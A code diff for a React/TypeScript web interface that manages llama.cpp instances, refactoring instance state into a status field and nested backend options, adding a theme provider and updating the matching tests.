const DUMMY_API_KEY = 'test-api-key-123' const DUMMY_API_KEY = 'test-api-key-123'

View File

@@ -3,6 +3,7 @@ import { render, screen, waitFor } from '@testing-library/react'
import userEvent from '@testing-library/user-event' import userEvent from '@testing-library/user-event'
import InstanceDialog from '@/components/InstanceDialog' import InstanceDialog from '@/components/InstanceDialog'
import type { Instance } from '@/types/instance' import type { Instance } from '@/types/instance'
import { BackendType } from '@/types/instance'
describe('InstanceModal - Form Logic and Validation', () => { describe('InstanceModal - Form Logic and Validation', () => {
const mockOnSave = vi.fn() const mockOnSave = vi.fn()
@@ -91,6 +92,7 @@ afterEach(() => {
expect(mockOnSave).toHaveBeenCalledWith('my-instance', { expect(mockOnSave).toHaveBeenCalledWith('my-instance', {
auto_restart: true, // Default value auto_restart: true, // Default value
backend_type: BackendType.LLAMA_CPP
}) })
}) })
@@ -134,10 +136,10 @@ afterEach(() => {
describe('Edit Mode', () => { describe('Edit Mode', () => {
const mockInstance: Instance = { const mockInstance: Instance = {
name: 'existing-instance', name: 'existing-instance',
running: false, status: 'stopped',
options: { options: {
model: 'test-model.gguf', backend_type: BackendType.LLAMA_CPP,
gpu_layers: 10, backend_options: { model: 'test-model.gguf', gpu_layers: 10 },
auto_restart: false auto_restart: false
} }
} }
@@ -177,14 +179,14 @@ afterEach(() => {
await user.click(screen.getByTestId('dialog-save-button')) await user.click(screen.getByTestId('dialog-save-button'))
expect(mockOnSave).toHaveBeenCalledWith('existing-instance', { expect(mockOnSave).toHaveBeenCalledWith('existing-instance', {
model: 'test-model.gguf', backend_type: BackendType.LLAMA_CPP,
gpu_layers: 10, backend_options: { model: 'test-model.gguf', gpu_layers: 10 },
auto_restart: false auto_restart: false
}) })
}) })
it('shows correct button text for running vs stopped instances', () => { it('shows correct button text for running vs stopped instances', () => {
const runningInstance: Instance = { ...mockInstance, running: true } const runningInstance: Instance = { ...mockInstance, status: 'running' }
const { rerender } = render( const { rerender } = render(
<InstanceDialog <InstanceDialog
@@ -271,6 +273,7 @@ afterEach(() => {
expect(mockOnSave).toHaveBeenCalledWith('test-instance', { expect(mockOnSave).toHaveBeenCalledWith('test-instance', {
auto_restart: true, auto_restart: true,
backend_type: BackendType.LLAMA_CPP,
max_restarts: 5, max_restarts: 5,
restart_delay: 10 restart_delay: 10
}) })
@@ -321,6 +324,7 @@ afterEach(() => {
// Should only include non-empty values // Should only include non-empty values
expect(mockOnSave).toHaveBeenCalledWith('clean-instance', { expect(mockOnSave).toHaveBeenCalledWith('clean-instance', {
auto_restart: true, // Only this default value should be included auto_restart: true, // Only this default value should be included
backend_type: BackendType.LLAMA_CPP
}) })
}) })
@@ -345,7 +349,8 @@ afterEach(() => {
expect(mockOnSave).toHaveBeenCalledWith('numeric-test', { expect(mockOnSave).toHaveBeenCalledWith('numeric-test', {
auto_restart: true, auto_restart: true,
gpu_layers: 15, // Should be number, not string backend_type: BackendType.LLAMA_CPP,
backend_options: { gpu_layers: 15 }, // Should be number, not string
}) })
}) })
}) })

View File

@@ -113,8 +113,8 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
setError(null) setError(null)
await instancesApi.start(name) await instancesApi.start(name)
// Update only this instance's running status // Update only this instance's status
updateInstanceInMap(name, { running: true }) updateInstanceInMap(name, { status: "running" })
} catch (err) { } catch (err) {
setError(err instanceof Error ? err.message : 'Failed to start instance') setError(err instanceof Error ? err.message : 'Failed to start instance')
} }
@@ -125,8 +125,8 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
setError(null) setError(null)
await instancesApi.stop(name) await instancesApi.stop(name)
// Update only this instance's running status // Update only this instance's status
updateInstanceInMap(name, { running: false }) updateInstanceInMap(name, { status: "stopped" })
} catch (err) { } catch (err) {
setError(err instanceof Error ? err.message : 'Failed to stop instance') setError(err instanceof Error ? err.message : 'Failed to stop instance')
} }
@@ -137,8 +137,8 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
setError(null) setError(null)
await instancesApi.restart(name) await instancesApi.restart(name)
// Update only this instance's running status // Update only this instance's status
updateInstanceInMap(name, { running: true }) updateInstanceInMap(name, { status: "running" })
} catch (err) { } catch (err) {
setError(err instanceof Error ? err.message : 'Failed to restart instance') setError(err instanceof Error ? err.message : 'Failed to restart instance')
} }

View File

@@ -0,0 +1,54 @@
import { createContext, useContext, useEffect, useState, type ReactNode } from "react";
type Theme = "light" | "dark";
interface ThemeContextType {
theme: Theme;
toggleTheme: () => void;
}
const ThemeContext = createContext<ThemeContextType | undefined>(undefined);
interface ThemeProviderProps {
children: ReactNode;
}
export function ThemeProvider({ children }: ThemeProviderProps) {
const [theme, setTheme] = useState<Theme>(() => {
const stored = localStorage.getItem("theme");
if (stored === "light" || stored === "dark") {
return stored;
}
return window.matchMedia("(prefers-color-scheme: dark)").matches ? "dark" : "light";
});
useEffect(() => {
const root = document.documentElement;
if (theme === "dark") {
root.classList.add("dark");
} else {
root.classList.remove("dark");
}
localStorage.setItem("theme", theme);
}, [theme]);
const toggleTheme = () => {
setTheme(prevTheme => prevTheme === "light" ? "dark" : "light");
};
return (
<ThemeContext.Provider value={{ theme, toggleTheme }}>
{children}
</ThemeContext.Provider>
);
}
export function useTheme() {
const context = useContext(ThemeContext);
if (context === undefined) {
throw new Error("useTheme must be used within a ThemeProvider");
}
return context;
}

View File

@@ -4,6 +4,7 @@ import type { ReactNode } from "react";
import { InstancesProvider, useInstances } from "@/contexts/InstancesContext"; import { InstancesProvider, useInstances } from "@/contexts/InstancesContext";
import { instancesApi } from "@/lib/api"; import { instancesApi } from "@/lib/api";
import type { Instance } from "@/types/instance"; import type { Instance } from "@/types/instance";
import { BackendType } from "@/types/instance";
import { AuthProvider } from "../AuthContext"; import { AuthProvider } from "../AuthContext";
// Mock the API module // Mock the API module
@@ -41,19 +42,19 @@ function TestComponent() {
<div data-testid="instances-count">{instances.length}</div> <div data-testid="instances-count">{instances.length}</div>
{instances.map((instance) => ( {instances.map((instance) => (
<div key={instance.name} data-testid={`instance-${instance.name}`}> <div key={instance.name} data-testid={`instance-${instance.name}`}>
{instance.name}:{instance.running.toString()} {instance.name}:{instance.status}
</div> </div>
))} ))}
{/* Action buttons for testing with specific instances */} {/* Action buttons for testing with specific instances */}
<button <button
onClick={() => createInstance("new-instance", { model: "test.gguf" })} onClick={() => createInstance("new-instance", { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "test.gguf" } })}
data-testid="create-instance" data-testid="create-instance"
> >
Create Instance Create Instance
</button> </button>
<button <button
onClick={() => updateInstance("instance1", { model: "updated.gguf" })} onClick={() => updateInstance("instance1", { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "updated.gguf" } })}
data-testid="update-instance" data-testid="update-instance"
> >
Update Instance Update Instance
@@ -99,8 +100,8 @@ function renderWithProvider(children: ReactNode) {
describe("InstancesContext", () => { describe("InstancesContext", () => {
const mockInstances: Instance[] = [ const mockInstances: Instance[] = [
{ name: "instance1", running: true, options: { model: "model1.gguf" } }, { name: "instance1", status: "running", options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "model1.gguf" } } },
{ name: "instance2", running: false, options: { model: "model2.gguf" } }, { name: "instance2", status: "stopped", options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "model2.gguf" } } },
]; ];
beforeEach(() => { beforeEach(() => {
@@ -132,10 +133,10 @@ describe("InstancesContext", () => {
expect(screen.getByTestId("loading")).toHaveTextContent("false"); expect(screen.getByTestId("loading")).toHaveTextContent("false");
expect(screen.getByTestId("instances-count")).toHaveTextContent("2"); expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
expect(screen.getByTestId("instance-instance1")).toHaveTextContent( expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
"instance1:true" "instance1:running"
); );
expect(screen.getByTestId("instance-instance2")).toHaveTextContent( expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
"instance2:false" "instance2:stopped"
); );
}); });
}); });
@@ -158,8 +159,8 @@ describe("InstancesContext", () => {
it("creates instance and adds it to state", async () => { it("creates instance and adds it to state", async () => {
const newInstance: Instance = { const newInstance: Instance = {
name: "new-instance", name: "new-instance",
running: false, status: "stopped",
options: { model: "test.gguf" }, options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "test.gguf" } },
}; };
vi.mocked(instancesApi.create).mockResolvedValue(newInstance); vi.mocked(instancesApi.create).mockResolvedValue(newInstance);
@@ -174,14 +175,15 @@ describe("InstancesContext", () => {
await waitFor(() => { await waitFor(() => {
expect(instancesApi.create).toHaveBeenCalledWith("new-instance", { expect(instancesApi.create).toHaveBeenCalledWith("new-instance", {
model: "test.gguf", backend_type: BackendType.LLAMA_CPP,
backend_options: { model: "test.gguf" }
}); });
}); });
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId("instances-count")).toHaveTextContent("3"); expect(screen.getByTestId("instances-count")).toHaveTextContent("3");
expect(screen.getByTestId("instance-new-instance")).toHaveTextContent( expect(screen.getByTestId("instance-new-instance")).toHaveTextContent(
"new-instance:false" "new-instance:stopped"
); );
}); });
}); });
@@ -214,8 +216,8 @@ describe("InstancesContext", () => {
it("updates instance and maintains it in state", async () => { it("updates instance and maintains it in state", async () => {
const updatedInstance: Instance = { const updatedInstance: Instance = {
name: "instance1", name: "instance1",
running: true, status: "running",
options: { model: "updated.gguf" }, options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "updated.gguf" } },
}; };
vi.mocked(instancesApi.update).mockResolvedValue(updatedInstance); vi.mocked(instancesApi.update).mockResolvedValue(updatedInstance);
@@ -230,7 +232,8 @@ describe("InstancesContext", () => {
await waitFor(() => { await waitFor(() => {
expect(instancesApi.update).toHaveBeenCalledWith("instance1", { expect(instancesApi.update).toHaveBeenCalledWith("instance1", {
model: "updated.gguf", backend_type: BackendType.LLAMA_CPP,
backend_options: { model: "updated.gguf" }
}); });
}); });
@@ -251,7 +254,7 @@ describe("InstancesContext", () => {
expect(screen.getByTestId("loading")).toHaveTextContent("false"); expect(screen.getByTestId("loading")).toHaveTextContent("false");
// instance2 starts as not running // instance2 starts as not running
expect(screen.getByTestId("instance-instance2")).toHaveTextContent( expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
"instance2:false" "instance2:stopped"
); );
}); });
@@ -262,7 +265,7 @@ describe("InstancesContext", () => {
expect(instancesApi.start).toHaveBeenCalledWith("instance2"); expect(instancesApi.start).toHaveBeenCalledWith("instance2");
// The running state should be updated to true // The running state should be updated to true
expect(screen.getByTestId("instance-instance2")).toHaveTextContent( expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
"instance2:true" "instance2:running"
); );
}); });
}); });
@@ -276,7 +279,7 @@ describe("InstancesContext", () => {
expect(screen.getByTestId("loading")).toHaveTextContent("false"); expect(screen.getByTestId("loading")).toHaveTextContent("false");
// instance1 starts as running // instance1 starts as running
expect(screen.getByTestId("instance-instance1")).toHaveTextContent( expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
"instance1:true" "instance1:running"
); );
}); });
@@ -287,7 +290,7 @@ describe("InstancesContext", () => {
expect(instancesApi.stop).toHaveBeenCalledWith("instance1"); expect(instancesApi.stop).toHaveBeenCalledWith("instance1");
// The running state should be updated to false // The running state should be updated to false
expect(screen.getByTestId("instance-instance1")).toHaveTextContent( expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
"instance1:false" "instance1:stopped"
); );
}); });
}); });
@@ -383,7 +386,7 @@ describe("InstancesContext", () => {
// Test that operations don't interfere with each other // Test that operations don't interfere with each other
const newInstance: Instance = { const newInstance: Instance = {
name: "new-instance", name: "new-instance",
running: false, status: "stopped",
options: {}, options: {},
}; };
vi.mocked(instancesApi.create).mockResolvedValue(newInstance); vi.mocked(instancesApi.create).mockResolvedValue(newInstance);
@@ -411,7 +414,7 @@ describe("InstancesContext", () => {
expect(screen.getByTestId("instances-count")).toHaveTextContent("3"); // Still 3 expect(screen.getByTestId("instances-count")).toHaveTextContent("3"); // Still 3
// But the running state should change // But the running state should change
expect(screen.getByTestId("instance-instance2")).toHaveTextContent( expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
"instance2:true" "instance2:running"
); );
}); });
}); });

View File

@@ -1,14 +1,19 @@
// ui/src/hooks/useInstanceHealth.ts // ui/src/hooks/useInstanceHealth.ts
import { useState, useEffect } from 'react' import { useState, useEffect } from 'react'
import type { HealthStatus } from '@/types/instance' import type { HealthStatus, InstanceStatus } from '@/types/instance'
import { healthService } from '@/lib/healthService' import { healthService } from '@/lib/healthService'
export function useInstanceHealth(instanceName: string, isRunning: boolean): HealthStatus | undefined { export function useInstanceHealth(instanceName: string, instanceStatus: InstanceStatus): HealthStatus | undefined {
const [health, setHealth] = useState<HealthStatus | undefined>() const [health, setHealth] = useState<HealthStatus | undefined>()
useEffect(() => { useEffect(() => {
if (!isRunning) { if (instanceStatus === "stopped") {
setHealth(undefined) setHealth({ status: "unknown", lastChecked: new Date() })
return
}
if (instanceStatus === "failed") {
setHealth({ status: instanceStatus, lastChecked: new Date() })
return return
} }
@@ -17,9 +22,9 @@ export function useInstanceHealth(instanceName: string, isRunning: boolean): Hea
setHealth(healthStatus) setHealth(healthStatus)
}) })
// Cleanup subscription on unmount or when running changes // Cleanup subscription on unmount or when instanceStatus changes
return unsubscribe return unsubscribe
}, [instanceName, isRunning]) }, [instanceName, instanceStatus])
return health return health
} }

View File

@@ -1,6 +1,6 @@
import { type CreateInstanceOptions, getAllFieldKeys } from '@/schemas/instanceOptions' import { type CreateInstanceOptions, type BackendOptions, getAllFieldKeys, getAllBackendFieldKeys } from '@/schemas/instanceOptions'
// Only define the basic fields we want to show by default // Instance-level basic fields (not backend-specific)
export const basicFieldsConfig: Record<string, { export const basicFieldsConfig: Record<string, {
label: string label: string
description?: string description?: string
@@ -21,6 +21,28 @@ export const basicFieldsConfig: Record<string, {
placeholder: '5', placeholder: '5',
description: 'Delay in seconds before attempting restart' description: 'Delay in seconds before attempting restart'
}, },
idle_timeout: {
label: 'Idle Timeout (minutes)',
placeholder: '60',
description: 'Time in minutes before instance is considered idle and stopped'
},
on_demand_start: {
label: 'On-Demand Start',
description: 'Start instance upon receiving OpenAI-compatible API request'
},
backend_type: {
label: 'Backend Type',
description: 'Type of backend to use for this instance'
}
}
// Backend-specific basic fields (these go in backend_options)
export const basicBackendFieldsConfig: Record<string, {
label: string
description?: string
placeholder?: string
required?: boolean
}> = {
model: { model: {
label: 'Model Path', label: 'Model Path',
placeholder: '/path/to/model.gguf', placeholder: '/path/to/model.gguf',
@@ -47,6 +69,10 @@ export function isBasicField(key: keyof CreateInstanceOptions): boolean {
return key in basicFieldsConfig return key in basicFieldsConfig
} }
export function isBasicBackendField(key: keyof BackendOptions): boolean {
return key in basicBackendFieldsConfig
}
export function getBasicFields(): (keyof CreateInstanceOptions)[] { export function getBasicFields(): (keyof CreateInstanceOptions)[] {
return Object.keys(basicFieldsConfig) as (keyof CreateInstanceOptions)[] return Object.keys(basicFieldsConfig) as (keyof CreateInstanceOptions)[]
} }
@@ -55,5 +81,13 @@ export function getAdvancedFields(): (keyof CreateInstanceOptions)[] {
return getAllFieldKeys().filter(key => !isBasicField(key)) return getAllFieldKeys().filter(key => !isBasicField(key))
} }
export function getBasicBackendFields(): (keyof BackendOptions)[] {
return Object.keys(basicBackendFieldsConfig) as (keyof BackendOptions)[]
}
export function getAdvancedBackendFields(): (keyof BackendOptions)[] {
return getAllBackendFieldKeys().filter(key => !isBasicBackendField(key))
}
// Re-export the Zod-based functions // Re-export the Zod-based functions
export { getFieldType } from '@/schemas/instanceOptions' export { getFieldType, getBackendFieldType } from '@/schemas/instanceOptions'

View File

@@ -1,12 +1,8 @@
import { BackendType } from '@/types/instance'
import { z } from 'zod' import { z } from 'zod'
// Define the Zod schema // Define the backend options schema (previously embedded in CreateInstanceOptionsSchema)
export const CreateInstanceOptionsSchema = z.object({ export const BackendOptionsSchema = z.object({
// Restart options
auto_restart: z.boolean().optional(),
max_restarts: z.number().optional(),
restart_delay: z.number().optional(),
// Common params // Common params
verbose_prompt: z.boolean().optional(), verbose_prompt: z.boolean().optional(),
threads: z.number().optional(), threads: z.number().optional(),
@@ -174,22 +170,57 @@ export const CreateInstanceOptionsSchema = z.object({
fim_qwen_14b_spec: z.boolean().optional(), fim_qwen_14b_spec: z.boolean().optional(),
}) })
// Infer the TypeScript type from the schema // Define the main create instance options schema
export const CreateInstanceOptionsSchema = z.object({
// Restart options
auto_restart: z.boolean().optional(),
max_restarts: z.number().optional(),
restart_delay: z.number().optional(),
idle_timeout: z.number().optional(),
on_demand_start: z.boolean().optional(),
// Backend configuration
backend_type: z.enum([BackendType.LLAMA_CPP]).optional(),
backend_options: BackendOptionsSchema.optional(),
})
// Infer the TypeScript types from the schemas
export type BackendOptions = z.infer<typeof BackendOptionsSchema>
export type CreateInstanceOptions = z.infer<typeof CreateInstanceOptionsSchema> export type CreateInstanceOptions = z.infer<typeof CreateInstanceOptionsSchema>
// Helper to get all field keys // Helper to get all field keys for CreateInstanceOptions
export function getAllFieldKeys(): (keyof CreateInstanceOptions)[] { export function getAllFieldKeys(): (keyof CreateInstanceOptions)[] {
return Object.keys(CreateInstanceOptionsSchema.shape) as (keyof CreateInstanceOptions)[] return Object.keys(CreateInstanceOptionsSchema.shape) as (keyof CreateInstanceOptions)[]
} }
// Helper to get all backend option field keys
export function getAllBackendFieldKeys(): (keyof BackendOptions)[] {
return Object.keys(BackendOptionsSchema.shape) as (keyof BackendOptions)[]
}
// Get field type from Zod schema // Get field type from Zod schema
export function getFieldType(key: keyof CreateInstanceOptions): 'text' | 'number' | 'boolean' | 'array' { export function getFieldType(key: keyof CreateInstanceOptions): 'text' | 'number' | 'boolean' | 'array' | 'object' {
const fieldSchema = CreateInstanceOptionsSchema.shape[key] const fieldSchema = CreateInstanceOptionsSchema.shape[key]
if (!fieldSchema) return 'text' if (!fieldSchema) return 'text'
// Handle ZodOptional wrapper // Handle ZodOptional wrapper
const innerSchema = fieldSchema instanceof z.ZodOptional ? fieldSchema.unwrap() : fieldSchema const innerSchema = fieldSchema instanceof z.ZodOptional ? fieldSchema.unwrap() : fieldSchema
if (innerSchema instanceof z.ZodBoolean) return 'boolean'
if (innerSchema instanceof z.ZodNumber) return 'number'
if (innerSchema instanceof z.ZodArray) return 'array'
if (innerSchema instanceof z.ZodObject) return 'object'
return 'text' // ZodString and others default to text
}
// Get field type for backend options
export function getBackendFieldType(key: keyof BackendOptions): 'text' | 'number' | 'boolean' | 'array' {
const fieldSchema = BackendOptionsSchema.shape[key]
if (!fieldSchema) return 'text'
// Handle ZodOptional wrapper
const innerSchema = fieldSchema instanceof z.ZodOptional ? fieldSchema.unwrap() : fieldSchema
if (innerSchema instanceof z.ZodBoolean) return 'boolean' if (innerSchema instanceof z.ZodBoolean) return 'boolean'
if (innerSchema instanceof z.ZodNumber) return 'number' if (innerSchema instanceof z.ZodNumber) return 'number'
if (innerSchema instanceof z.ZodArray) return 'array' if (innerSchema instanceof z.ZodArray) return 'array'

View File

@@ -2,14 +2,22 @@ import type { CreateInstanceOptions } from '@/schemas/instanceOptions'
export { type CreateInstanceOptions } from '@/schemas/instanceOptions' export { type CreateInstanceOptions } from '@/schemas/instanceOptions'
export const BackendType = {
LLAMA_CPP: 'llama_cpp'
} as const
export type BackendTypeValue = typeof BackendType[keyof typeof BackendType]
export type InstanceStatus = 'running' | 'stopped' | 'failed'
export interface HealthStatus { export interface HealthStatus {
status: 'ok' | 'loading' | 'error' | 'unknown' status: 'ok' | 'loading' | 'error' | 'unknown' | 'failed'
message?: string message?: string
lastChecked: Date lastChecked: Date
} }
export interface Instance { export interface Instance {
name: string; name: string;
running: boolean; status: InstanceStatus;
options?: CreateInstanceOptions; options?: CreateInstanceOptions;
} }

13
webui/src/vite-env.d.ts vendored Normal file
View File

@@ -0,0 +1,13 @@
/// <reference types="vite/client" />
declare global {
interface ImportMetaEnv {
readonly VITE_APP_VERSION?: string
}
interface ImportMeta {
readonly env: ImportMetaEnv
}
}
export {}

View File

@@ -18,8 +18,9 @@
"baseUrl": ".", "baseUrl": ".",
"paths": { "paths": {
"@/*": ["./src/*"] "@/*": ["./src/*"]
}
}, },
"include": ["src"], "types": ["vite/client"]
},
"include": ["src", "src/vite-env.d.ts"],
"references": [{ "path": "./tsconfig.node.json" }] "references": [{ "path": "./tsconfig.node.json" }]
} }